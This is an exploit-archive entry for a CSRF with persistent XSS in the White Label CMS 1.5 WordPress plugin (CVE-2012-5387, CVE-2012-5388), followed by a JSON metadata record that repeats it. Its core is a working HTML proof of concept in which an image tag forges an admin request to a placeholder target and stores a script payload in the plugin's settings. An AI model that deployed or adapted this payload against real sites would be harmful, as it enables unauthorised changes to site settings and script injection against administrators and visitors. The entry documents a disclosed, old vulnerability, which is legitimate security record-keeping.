ID 1337DAY-ID-19607
Type zdt
Reporter pcsjj
Modified 2012-10-21T00:00:00
Description
CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)
# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS
# Date: 21/10/2012
# Exploit Author: pcsjj
# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/
# Version: 1.5
# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/
# Downloads: 110,313
# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)
<html>
<title>White Label CMS CSRF</title>
<body>
<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div
"'>
</body>
</html>
# 0day.today [2018-03-13] #
{"published": "2012-10-21T00:00:00", "id": "1337DAY-ID-19607", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:11:23", "bulletin": {"published": "2012-10-21T00:00:00", "id": "1337DAY-ID-19607", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.8, "modified": "2016-04-20T01:11:23"}}, "hash": "0be51db4596cd7beed0e7c4d966edee0b603f136e586de3166a47875d36eebab", "description": "CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)", "type": "zdt", "lastseen": "2016-04-20T01:11:23", "edition": 1, "title": "White Label CMS v 1.5 CSRF / Persistent XSS", "href": "http://0day.today/exploit/description/19607", "modified": "2012-10-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/19607", "references": [], "reporter": "pcsjj", "sourceData": "# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS\r\n# Date: 21/10/2012\r\n# Exploit Author: pcsjj\r\n# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/\r\n# Version: 1.5\r\n# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/\r\n# Downloads: 110,313\r\n# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)\r\n \r\n<html>\r\n<title>White Label CMS CSRF</title>\r\n<body>\r\n<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name=\"><script>alert(\"fun\")</script><div\r\n\"'>\r\n</body>\r\n</html>\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "e999e7cd13d5ee94d4e9501e4b119371", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "04c50c16c79a4eccb09a660434bc06c5", "key": "description"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7f18ce50576690ef04eac83811db1fa1", "key": "published"}, {"hash": "4bbe4aeb90706e02523ce966f3290cc1", "key": "sourceData"}, {"hash": "7f18ce50576690ef04eac83811db1fa1", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "7e1ca0bc0c4b8bd6b3376b4f947c6ad4", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "e22e22eeda8c92dbb601b565849a15d6", "key": "sourceHref"}, {"hash": "b08a49918eabfc173cd2ed4d04758e8d", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)", "hash": "82f360934621297af90af585d7ec7e0b79cd59261081eac0a281552af1c3723d", "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-03-13T03:09:28", "edition": 2, "title": "White Label CMS v 1.5 CSRF / Persistent XSS", "href": "https://0day.today/exploit/description/19607", "modified": "2012-10-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "https://0day.today/exploit/19607", "references": [], "reporter": "pcsjj", "sourceData": "# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS\r\n# Date: 21/10/2012\r\n# Exploit Author: pcsjj\r\n# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/\r\n# Version: 1.5\r\n# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/\r\n# Downloads: 110,313\r\n# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)\r\n \r\n<html>\r\n<title>White Label CMS CSRF</title>\r\n<body>\r\n<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name=\"><script>alert(\"fun\")</script><div\r\n\"'>\r\n</body>\r\n</html>\n\n# 0day.today [2018-03-13] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "04c50c16c79a4eccb09a660434bc06c5", "key": "description"}, {"hash": "ba5709ccfc507a60092ede5238558d14", "key": "href"}, {"hash": "7f18ce50576690ef04eac83811db1fa1", "key": "modified"}, {"hash": "7f18ce50576690ef04eac83811db1fa1", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b08a49918eabfc173cd2ed4d04758e8d", "key": "reporter"}, {"hash": "e3b50dd84cfae809dc6c1f803b03d29b", "key": "sourceData"}, {"hash": "1f895eaad22486853db36017f86e4d48", "key": "sourceHref"}, {"hash": "7e1ca0bc0c4b8bd6b3376b4f947c6ad4", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"result": {}}
